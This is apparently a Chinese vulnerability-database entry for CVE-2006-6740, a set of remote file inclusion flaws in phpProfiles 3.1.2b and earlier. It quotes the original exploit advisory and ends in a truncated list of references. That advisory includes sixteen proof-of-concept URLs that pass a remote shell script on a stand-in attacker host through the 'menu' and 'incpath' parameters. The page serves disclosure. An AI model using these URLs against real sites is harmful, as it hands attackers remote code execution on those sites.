PHPProfiles多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111801 漏洞类型 代码注入
发布时间 2006-12-19 更新时间 2007-03-02
CVE编号 CVE-2006-6740 CNNVD-ID CNNVD-200612-544
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2956
https://www.securityfocus.com/bid/21667
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-544
|漏洞详情
phpProfiles3.1.2b及更早版本中的多个PHP远程文件包含漏洞,远程攻击者可以通过传给(1)includes/body.inc.php或(2)include/body_admin.inc.php的menu参数中的URL;或者传给include/中的(3)index.inc.php,(4)account.inc.php,(5)admin_newcomm.inc.php,(6)header_admin.inc.php,(7)header.inc.php,(8)friends.inc.php,(9)menu_u.inc.php,(10)notify.inc.php,(11)body.inc.php,(12)body_admin.inc.php,(13)commrecc.inc.php,(14)do_reg.inc.php,(15)comm_post.inc.php或(16)menu_v.inc.php的incpath参数中的URL,来执行任意PHP代码。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Affected Software .: phpProfiles <= 3.1.2b
+ Download ..........: http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip
+ Description .......: "phpProfiles allows you to offer visitors their very own URL on your web site simply by registering"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ phpProfiles has several scripts which do not initialize variables before using them to
+ include files, assuming register_globals = on, we can initialize any one of the variables
+ in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php");
+ include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p>
+ include/account.inc.php,   line(s) 09: include("$incpath/footer.inc.php");
+ include/index.inc.php,     line(s) 05: include("$incpath/adminerr.inc.php");
+ ... see below for a list of files affected.
+ 
+ Proof Of Concept:
+ http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-19]
|受影响的产品
phpProfiles phpProfiles 3.1.2b phpProfiles phpProfiles 2.1
|参考资料

来源:XF
名称:phpprofiles-multiple-parameters-file-include(30997)
链接:http://xforce.iss.net/xforce/xfdb/30997
来源:BID
名称:21667
链接:http://www.securityfocus.com/bid/21667
来源:MILW0RM
名称:2956
链接:http://www.milw0rm.com/exploits/2956
来源:VUPEN
名称:ADV-2006-5087
链接:http://www.frsirt.com/english/advisories/2006/5087
来源:SECUNIA
名称:23423
链接:http://secunia.com/advisories/23423
来源:OSVDB
名称:32376
链接:http://www.osvdb.org/32376
来源:OSVDB
名称:32375
链接:http://www.osvdb.org/32375
来源:OSVDB
名称:32374
链接:http://www.osvdb.org/32374
来源:OSVDB
名称:32373
链接:http://www.osvdb.org/32373
来源:OSVDB
名称:32372
链接:http://www.osvdb.org/32372
来源:OSVDB
名称:32371
链接:http://www.osvdb.org/32371
来源:OSVDB
名称:32370
链接:http://www.osvdb.org/32370
来源:OSVDB
名称:32369
链接:http://www.osvdb.org/32369
来源:OSVDB
名称:32368
链接:http://www.osvdb.org/32368
来源:OSVDB
名称:32367
链接:http://www.osvdb.org/32367
来源:OSVDB
名称:32366
链接:http://www.osvdb.org/32366
来源:OSVDB
名称:32365
链接:http://www.osvdb.org/32365
来源:OSVDB
名称:32364
链接:http://www.osvdb.org/32364
来源:OSVDB
名称:323